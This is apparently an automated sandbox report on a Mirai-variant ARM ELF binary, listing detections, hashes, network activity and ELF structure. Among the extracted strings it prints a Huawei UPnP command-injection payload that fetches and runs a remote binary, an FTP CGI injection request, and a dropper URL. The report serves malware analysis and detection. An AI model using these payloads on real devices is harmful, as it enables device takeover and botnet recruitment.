Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
hgfs.arm7.elf

Overview

General Information

Sample name:hgfs.arm7.elf
Analysis ID:1639192
MD5:e8115e9914d8119cd46f756507f589d2
SHA1:678b6abceec959243454b0661aac9f1e25d4bcd2
SHA256:1d4ad085522287fa1c170f89f09d1ed3f46c9ba362343de5e1ef2b07579fadad
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:64
Range:0 - 100

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1639192
Start date and time:2025-03-15 03:52:15 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 10m 29s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:hgfs.arm7.elf
Detection:MAL
Classification:mal64.troj.linELF@0/0@0/0
Cookbook Comments:
  • Analysis time extended to 480s due to sleep detection in submitted sample
  • VT rate limit hit for: http://167.99.88.89/a
Command:/tmp/hgfs.arm7.elf
PID:6257
Exit Code:255
Exit Code Info:
Killed:False
Standard Output:

Standard Error:/lib/ld-uClibc.so.0: No such file or directory
  • system is lnxubuntu20
  • hgfs.arm7.elf (PID: 6257, Parent: 6180, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/hgfs.arm7.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
hgfs.arm7.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
    hgfs.arm7.elfMAL_ELF_LNX_Mirai_Oct10_1Detects ELF Mirai variantFlorian Roth
    • 0x743f:$x2: /bin/busybox chmod 777 * /tmp/
    • 0x71a8:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
    SourceRuleDescriptionAuthorStrings
    6257.1.00007fd498026000.00007fd498027000.rw-.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      6257.1.00007fd498017000.00007fd49801f000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        6257.1.00007fd498017000.00007fd49801f000.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_1Detects ELF Mirai variantFlorian Roth
        • 0x743f:$x2: /bin/busybox chmod 777 * /tmp/
        • 0x71a8:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
        Process Memory Space: hgfs.arm7.elf PID: 6257JoeSecurity_Mirai_6Yara detected MiraiJoe Security
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: hgfs.arm7.elfReversingLabs: Detection: 50%
          Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
          Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
          Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
          Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
          Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
          Source: hgfs.arm7.elfString found in binary or memory: http://167.99.88.89/a
          Source: hgfs.arm7.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: hgfs.arm7.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

          System Summary

          barindex
          Source: hgfs.arm7.elf, type: SAMPLEMatched rule: Detects ELF Mirai variant Author: Florian Roth
          Source: 6257.1.00007fd498017000.00007fd49801f000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.67.36.189 -l /tmp/.oxy -r /bins/oxy.mips; /bin/busybox chmod 777 * /tmp/.oxy; /tmp/.oxy)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial samplePotential command found: GET /set_ftp.cgi?loginuse=
          Source: Initial samplePotential command found: GET /ftptest.cgi?loginuse=
          Source: Initial samplePotential command found: GET login.cgi HTTP/1.0
          Source: Initial samplePotential command found: GET /set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28echo+-e+cd+/tmp+>>+/tmp/t%29 HTTP/1.0
          Source: Initial samplePotential command found: GET /ftptest.cgi?loginuse= HTTP/1.0
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: hgfs.arm7.elf, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
          Source: 6257.1.00007fd498017000.00007fd49801f000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
          Source: classification engineClassification label: mal64.troj.linELF@0/0@0/0
          Source: /tmp/hgfs.arm7.elf (PID: 6257)Queries kernel information via 'uname': Jump to behavior
          Source: hgfs.arm7.elf, 6257.1.00007ffcfd129000.00007ffcfd14a000.rw-.sdmp, hgfs.arm7.elf, 6257.1.0000562a66444000.0000562a66572000.rw-.sdmpBinary or memory string: /tmp/hgfs.arm7.elf
          Source: hgfs.arm7.elf, 6257.1.0000562a66444000.0000562a66572000.rw-.sdmpBinary or memory string: @Df*Vrg.qemu.gdb.arm.sys.regs">
          Source: hgfs.arm7.elf, 6257.1.00007ffcfd129000.00007ffcfd14a000.rw-.sdmpBinary or memory string: qemu: %s: %s
          Source: hgfs.arm7.elf, 6257.1.00007ffcfd129000.00007ffcfd14a000.rw-.sdmpBinary or memory string: !x86_64/usr/bin/qemu-arm/tmp/hgfs.arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/hgfs.arm7.elf
          Source: hgfs.arm7.elf, 6257.1.00007ffcfd129000.00007ffcfd14a000.rw-.sdmpBinary or memory string: leqemu: %s: %s
          Source: hgfs.arm7.elf, 6257.1.0000562a66444000.0000562a66572000.rw-.sdmpBinary or memory string: Ef*V!/tmp/hgfs.arm7.elf!AttributeTypeAndValue
          Source: hgfs.arm7.elf, 6257.1.0000562a66444000.0000562a66572000.rw-.sdmpBinary or memory string: Ef*V!/etc/qemu-binfmt/arm
          Source: hgfs.arm7.elf, 6257.1.0000562a66444000.0000562a66572000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
          Source: hgfs.arm7.elf, 6257.1.00007ffcfd129000.00007ffcfd14a000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
          Source: hgfs.arm7.elf, 6257.1.0000562a66444000.0000562a66572000.rw-.sdmpBinary or memory string: /tmp/hgfs.arm7.elfSHELL=/bin/bashSUDO_GID=1000MAIL=/var/mail/rootHOME=/rootSUDO_COMMAND=/bin/bashLANG=en_US.UTF-8USER=rootLOGNAME=rootCOLORTERM=truecolorTERM=xterm-256colorSUDO_UID=1000XAUTHORITY=/run/user/1000/gdm/XauthorityDISPLAY=:1.0PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binSUDO_USER=saturnino/tmp/hgfs.arm7.elf
          Source: hgfs.arm7.elf, 6257.1.0000562a66444000.0000562a66572000.rw-.sdmpBinary or memory string: rg.qemu.gdb.arm.sys.regs">

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: hgfs.arm7.elf, type: SAMPLE
          Source: Yara matchFile source: 6257.1.00007fd498026000.00007fd498027000.rw-.sdmp, type: MEMORY
          Source: Yara matchFile source: 6257.1.00007fd498017000.00007fd49801f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: hgfs.arm7.elf PID: 6257, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: hgfs.arm7.elf, type: SAMPLE
          Source: Yara matchFile source: 6257.1.00007fd498026000.00007fd498027000.rw-.sdmp, type: MEMORY
          Source: Yara matchFile source: 6257.1.00007fd498017000.00007fd49801f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: hgfs.arm7.elf PID: 6257, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Command and Scripting Interpreter
          Path InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping11
          Security Software Discovery
          Remote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
          Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          No configs have been found

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          hgfs.arm7.elf50%ReversingLabsLinux.Trojan.Mirai
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          No contacted domains info
          NameSourceMaliciousAntivirus DetectionReputation
          http://167.99.88.89/ahgfs.arm7.elffalse
            unknown
            http://schemas.xmlsoap.org/soap/encoding/hgfs.arm7.elffalse
              high
              http://schemas.xmlsoap.org/soap/envelope/hgfs.arm7.elffalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                109.202.202.202
                unknownSwitzerland
                13030INIT7CHfalse
                91.189.91.43
                unknownUnited Kingdom
                41231CANONICAL-ASGBfalse
                91.189.91.42
                unknownUnited Kingdom
                41231CANONICAL-ASGBfalse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                91.189.91.43na.elfGet hashmaliciousPrometeiBrowse
                  gigab.arm5.elfGet hashmaliciousGafgytBrowse
                    sh4.elfGet hashmaliciousUnknownBrowse
                      mpsl.elfGet hashmaliciousUnknownBrowse
                        na.elfGet hashmaliciousPrometeiBrowse
                          na.elfGet hashmaliciousPrometeiBrowse
                            na.elfGet hashmaliciousPrometeiBrowse
                              na.elfGet hashmaliciousPrometeiBrowse
                                na.elfGet hashmaliciousPrometeiBrowse
                                  .i.elfGet hashmaliciousUnknownBrowse
                                    91.189.91.42na.elfGet hashmaliciousPrometeiBrowse
                                      gigab.arm5.elfGet hashmaliciousGafgytBrowse
                                        sh4.elfGet hashmaliciousUnknownBrowse
                                          mpsl.elfGet hashmaliciousUnknownBrowse
                                            na.elfGet hashmaliciousPrometeiBrowse
                                              na.elfGet hashmaliciousPrometeiBrowse
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                      .i.elfGet hashmaliciousUnknownBrowse
                                                        No context
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        CANONICAL-ASGBna.elfGet hashmaliciousPrometeiBrowse
                                                        • 91.189.91.42
                                                        gigab.arm5.elfGet hashmaliciousGafgytBrowse
                                                        • 91.189.91.42
                                                        main_arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 185.125.190.26
                                                        sh4.elfGet hashmaliciousUnknownBrowse
                                                        • 91.189.91.42
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 185.125.190.26
                                                        mpsl.elfGet hashmaliciousUnknownBrowse
                                                        • 91.189.91.42
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 91.189.91.42
                                                        .i.elfGet hashmaliciousUnknownBrowse
                                                        • 185.125.190.26
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 91.189.91.42
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 185.125.190.26
                                                        CANONICAL-ASGBna.elfGet hashmaliciousPrometeiBrowse
                                                        • 91.189.91.42
                                                        gigab.arm5.elfGet hashmaliciousGafgytBrowse
                                                        • 91.189.91.42
                                                        main_arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 185.125.190.26
                                                        sh4.elfGet hashmaliciousUnknownBrowse
                                                        • 91.189.91.42
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 185.125.190.26
                                                        mpsl.elfGet hashmaliciousUnknownBrowse
                                                        • 91.189.91.42
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 91.189.91.42
                                                        .i.elfGet hashmaliciousUnknownBrowse
                                                        • 185.125.190.26
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 91.189.91.42
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 185.125.190.26
                                                        INIT7CHna.elfGet hashmaliciousPrometeiBrowse
                                                        • 109.202.202.202
                                                        gigab.arm5.elfGet hashmaliciousGafgytBrowse
                                                        • 109.202.202.202
                                                        sh4.elfGet hashmaliciousUnknownBrowse
                                                        • 109.202.202.202
                                                        mpsl.elfGet hashmaliciousUnknownBrowse
                                                        • 109.202.202.202
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 109.202.202.202
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 109.202.202.202
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 109.202.202.202
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 109.202.202.202
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 109.202.202.202
                                                        .i.elfGet hashmaliciousUnknownBrowse
                                                        • 109.202.202.202
                                                        No context
                                                        No context
                                                        No created / dropped files found
                                                        File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped
                                                        Entropy (8bit):5.839513927576266
                                                        TrID:
                                                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                        File name:hgfs.arm7.elf
                                                        File size:32'307 bytes
                                                        MD5:e8115e9914d8119cd46f756507f589d2
                                                        SHA1:678b6abceec959243454b0661aac9f1e25d4bcd2
                                                        SHA256:1d4ad085522287fa1c170f89f09d1ed3f46c9ba362343de5e1ef2b07579fadad
                                                        SHA512:461f240f83f6d6bd9ef6cd0c56f7ac0771c2e696e7024d0cd14aa91e67986e3501a904fd05044ae22e3e645cc1c0051f9fa48371462d8f2f4b35f9b57cccac46
                                                        SSDEEP:768:vdBc24LsGy3H+DvVgBwU3Xcb4gLO18Lp9NDnNn94zzZb9akkkkkkkkkkkkkkkkkE:VBcuGy3HQ9g+U3Xcb4gLOE/NTJ8Takkt
                                                        TLSH:A4E29288E919233AC3E177FFDF8542CF33BA1BD873EA79258631552423C8B646A35520
                                                        File Content Preview:.ELF..............(.........4....z......4. ...(.........4...4...4...................................................................`v..`v..............`v..`v..`v..\...................pv..pv..pv..................Q.td............................/lib/ld-uCl

                                                        ELF header

                                                        Class:ELF32
                                                        Data:2's complement, little endian
                                                        Version:1 (current)
                                                        Machine:ARM
                                                        Version Number:0x1
                                                        Type:EXEC (Executable file)
                                                        OS/ABI:UNIX - System V
                                                        ABI Version:0
                                                        Entry Point Address:0x8f04
                                                        Flags:0x4000002
                                                        ELF Header Size:52
                                                        Program Header Offset:52
                                                        Program Header Size:32
                                                        Number of Program Headers:6
                                                        Section Header Offset:31372
                                                        Section Header Size:40
                                                        Number of Section Headers:22
                                                        Header String Table Index:21
                                                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                        NULL0x00x00x00x00x0000
                                                        .interpPROGBITS0x80f40xf40x140x00x2A001
                                                        .hashHASH0x81080x1080x2300x40x2A304
                                                        .dynsymDYNSYM0x83380x3380x4700x100x2A414
                                                        .dynstrSTRTAB0x87a80x7a80x2060x00x2A001
                                                        .rel.pltREL0x89b00x9b00x1d80x80x2A374
                                                        .initPROGBITS0x8b880xb880x100x00x6AX004
                                                        .pltPROGBITS0x8b980xb980x2d80x40x6AX004
                                                        .textPROGBITS0x8e700xe700x60100x00x6AX004
                                                        .finiPROGBITS0xee800x6e800x100x00x6AX004
                                                        .rodataPROGBITS0xee900x6e900x7d00x00x2A004
                                                        .eh_framePROGBITS0x176600x76600x40x00x3WA004
                                                        .init_arrayINIT_ARRAY0x176640x76640x40x00x3WA004
                                                        .fini_arrayFINI_ARRAY0x176680x76680x40x00x3WA004
                                                        .jcrPROGBITS0x1766c0x766c0x40x00x3WA004
                                                        .dynamicDYNAMIC0x176700x76700xb80x80x3WA404
                                                        .gotPROGBITS0x177280x77280xf80x40x3WA004
                                                        .dataPROGBITS0x178200x78200x9c0x00x3WA004
                                                        .bssNOBITS0x178bc0x78bc0xd4b40x00x3WA004
                                                        .commentPROGBITS0x00x78bc0x1120x00x0001
                                                        .ARM.attributesARM_ATTRIBUTES0x00x79ce0x160x00x0001
                                                        .shstrtabSTRTAB0x00x79e40xa50x00x0001
                                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                        PHDR0x340x80340x80340xc00xc02.26870x5R E0x4
                                                        INTERP0xf40x80f40x80f40x140x143.68420x4R 0x1/lib/ld-uClibc.so.0.interp
                                                        LOAD0x00x80000x80000x76600x76605.86230x5R E0x8000.interp .hash .dynsym .dynstr .rel.plt .init .plt .text .fini .rodata
                                                        LOAD0x76600x176600x176600x25c0xd7103.92150x6RW 0x8000.eh_frame .init_array .fini_array .jcr .dynamic .got .data .bss
                                                        DYNAMIC0x76700x176700x176700xb80xb82.10620x6RW 0x4.dynamic
                                                        GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                        TypeMetaValueTag
                                                        DT_NEEDEDsharedliblibc.so.00x1
                                                        DT_INITvalue0x8b880xc
                                                        DT_FINIvalue0xee800xd
                                                        DT_INIT_ARRAYvalue0x176640x19
                                                        DT_INIT_ARRAYSZbytes40x1b
                                                        DT_FINI_ARRAYvalue0x176680x1a
                                                        DT_FINI_ARRAYSZbytes40x1c
                                                        DT_HASHvalue0x81080x4
                                                        DT_STRTABvalue0x87a80x5
                                                        DT_SYMTABvalue0x83380x6
                                                        DT_STRSZbytes5180xa
                                                        DT_SYMENTbytes160xb
                                                        DT_DEBUGvalue0x00x15
                                                        DT_PLTGOTvalue0x177280x3
                                                        DT_PLTRELSZbytes4720x2
                                                        DT_PLTRELpltrelDT_REL0x14
                                                        DT_JMPRELvalue0x89b00x17
                                                        DT_NULLvalue0x00x0
                                                        NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                                        .dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                        __bss_end__.dynsym0x24d700NOTYPE<unknown>DEFAULTSHN_ABS
                                                        __bss_start.dynsym0x178bc0NOTYPE<unknown>DEFAULTSHN_ABS
                                                        __bss_start__.dynsym0x178bc0NOTYPE<unknown>DEFAULTSHN_ABS
                                                        __data_start.dynsym0x178200NOTYPE<unknown>DEFAULT17
                                                        __end__.dynsym0x24d700NOTYPE<unknown>DEFAULTSHN_ABS
                                                        __errno_location.dynsym0x8dc832FUNC<unknown>DEFAULTSHN_UNDEF
                                                        __exidx_end.dynsym0xf6600NOTYPE<unknown>DEFAULTSHN_ABS
                                                        __exidx_start.dynsym0xf6600NOTYPE<unknown>DEFAULTSHN_ABS
                                                        __uClibc_main.dynsym0x8d50848FUNC<unknown>DEFAULTSHN_UNDEF
                                                        _bss_end__.dynsym0x24d700NOTYPE<unknown>DEFAULTSHN_ABS
                                                        _edata.dynsym0x178bc0NOTYPE<unknown>DEFAULTSHN_ABS
                                                        _end.dynsym0x24d700NOTYPE<unknown>DEFAULTSHN_ABS
                                                        _exit.dynsym0x8dec104FUNC<unknown>DEFAULTSHN_UNDEF
                                                        _start.dynsym0x8f0480FUNC<unknown>DEFAULT8
                                                        abort.dynsym0x8c78296FUNC<unknown>DEFAULTSHN_UNDEF
                                                        atoi.dynsym0x8de032FUNC<unknown>DEFAULTSHN_UNDEF
                                                        bind.dynsym0x8cb468FUNC<unknown>DEFAULTSHN_UNDEF
                                                        calloc.dynsym0x8c84320FUNC<unknown>DEFAULTSHN_UNDEF
                                                        clock.dynsym0x8e1052FUNC<unknown>DEFAULTSHN_UNDEF
                                                        close.dynsym0x8e34100FUNC<unknown>DEFAULTSHN_UNDEF
                                                        connect.dynsym0x8bd0116FUNC<unknown>DEFAULTSHN_UNDEF
                                                        exit.dynsym0x8dd4196FUNC<unknown>DEFAULTSHN_UNDEF
                                                        fcntl.dynsym0x8e28244FUNC<unknown>DEFAULTSHN_UNDEF
                                                        fork.dynsym0x8d44972FUNC<unknown>DEFAULTSHN_UNDEF
                                                        free.dynsym0x8e4c572FUNC<unknown>DEFAULTSHN_UNDEF
                                                        getpid.dynsym0x8bf472FUNC<unknown>DEFAULTSHN_UNDEF
                                                        getppid.dynsym0x8d8c20FUNC<unknown>DEFAULTSHN_UNDEF
                                                        getsockname.dynsym0x8e6468FUNC<unknown>DEFAULTSHN_UNDEF
                                                        getsockopt.dynsym0x8db072FUNC<unknown>DEFAULTSHN_UNDEF
                                                        htonl.dynsym0x8d1432FUNC<unknown>DEFAULTSHN_UNDEF
                                                        htons.dynsym0x8dbc16FUNC<unknown>DEFAULTSHN_UNDEF
                                                        inet_addr.dynsym0x8cc040FUNC<unknown>DEFAULTSHN_UNDEF
                                                        ioctl.dynsym0x8bb8224FUNC<unknown>DEFAULTSHN_UNDEF
                                                        kill.dynsym0x8c9c56FUNC<unknown>DEFAULTSHN_UNDEF
                                                        listen.dynsym0x8d3864FUNC<unknown>DEFAULTSHN_UNDEF
                                                        malloc.dynsym0x8c242360FUNC<unknown>DEFAULTSHN_UNDEF
                                                        memcpy.dynsym0x8c0c4FUNC<unknown>DEFAULTSHN_UNDEF
                                                        memmove.dynsym0x8be84FUNC<unknown>DEFAULTSHN_UNDEF
                                                        memset.dynsym0x8d68156FUNC<unknown>DEFAULTSHN_UNDEF
                                                        ntohl.dynsym0x8ccc32FUNC<unknown>DEFAULTSHN_UNDEF
                                                        ntohs.dynsym0x8d8016FUNC<unknown>DEFAULTSHN_UNDEF
                                                        open.dynsym0x8e04100FUNC<unknown>DEFAULTSHN_UNDEF
                                                        prctl.dynsym0x8c0068FUNC<unknown>DEFAULTSHN_UNDEF
                                                        raise.dynsym0x8e40240FUNC<unknown>DEFAULTSHN_UNDEF
                                                        rand.dynsym0x8cf024FUNC<unknown>DEFAULTSHN_UNDEF
                                                        read.dynsym0x8d08100FUNC<unknown>DEFAULTSHN_UNDEF
                                                        recv.dynsym0x8bc4112FUNC<unknown>DEFAULTSHN_UNDEF
                                                        recvfrom.dynsym0x8c3c136FUNC<unknown>DEFAULTSHN_UNDEF
                                                        select.dynsym0x8c54132FUNC<unknown>DEFAULTSHN_UNDEF
                                                        send.dynsym0x8c6c112FUNC<unknown>DEFAULTSHN_UNDEF
                                                        sendto.dynsym0x8d20136FUNC<unknown>DEFAULTSHN_UNDEF
                                                        setsid.dynsym0x8e1c64FUNC<unknown>DEFAULTSHN_UNDEF
                                                        setsockopt.dynsym0x8cd872FUNC<unknown>DEFAULTSHN_UNDEF
                                                        sigaddset.dynsym0x8c6080FUNC<unknown>DEFAULTSHN_UNDEF
                                                        sigemptyset.dynsym0x8bdc20FUNC<unknown>DEFAULTSHN_UNDEF
                                                        signal.dynsym0x8cfc196FUNC<unknown>DEFAULTSHN_UNDEF
                                                        sigprocmask.dynsym0x8e58140FUNC<unknown>DEFAULTSHN_UNDEF
                                                        sleep.dynsym0x8c30272FUNC<unknown>DEFAULTSHN_UNDEF
                                                        socket.dynsym0x8c4868FUNC<unknown>DEFAULTSHN_UNDEF
                                                        srand.dynsym0x8d74164FUNC<unknown>DEFAULTSHN_UNDEF
                                                        strcat.dynsym0x8ca840FUNC<unknown>DEFAULTSHN_UNDEF
                                                        strcmp.dynsym0x8da428FUNC<unknown>DEFAULTSHN_UNDEF
                                                        strcpy.dynsym0x8bac36FUNC<unknown>DEFAULTSHN_UNDEF
                                                        strdup.dynsym0x8d5c52FUNC<unknown>DEFAULTSHN_UNDEF
                                                        strlen.dynsym0x8df896FUNC<unknown>DEFAULTSHN_UNDEF
                                                        strstr.dynsym0x8ce4252FUNC<unknown>DEFAULTSHN_UNDEF
                                                        strtok.dynsym0x8d2c48FUNC<unknown>DEFAULTSHN_UNDEF
                                                        system.dynsym0x8c18132FUNC<unknown>DEFAULTSHN_UNDEF
                                                        time.dynsym0x8d9848FUNC<unknown>DEFAULTSHN_UNDEF
                                                        write.dynsym0x8c90100FUNC<unknown>DEFAULTSHN_UNDEF
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 15, 2025 03:53:03.032238960 CET43928443192.168.2.2391.189.91.42
                                                        Mar 15, 2025 03:53:08.663388014 CET42836443192.168.2.2391.189.91.43
                                                        Mar 15, 2025 03:53:10.199198008 CET4251680192.168.2.23109.202.202.202
                                                        Mar 15, 2025 03:53:22.997543097 CET43928443192.168.2.2391.189.91.42
                                                        Mar 15, 2025 03:53:35.283878088 CET42836443192.168.2.2391.189.91.43
                                                        Mar 15, 2025 03:53:41.427025080 CET4251680192.168.2.23109.202.202.202
                                                        Mar 15, 2025 03:54:03.951735020 CET43928443192.168.2.2391.189.91.42

                                                        System Behavior

                                                        Start time (UTC):02:53:01
                                                        Start date (UTC):15/03/2025
                                                        Path:/tmp/hgfs.arm7.elf
                                                        Arguments:/tmp/hgfs.arm7.elf
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1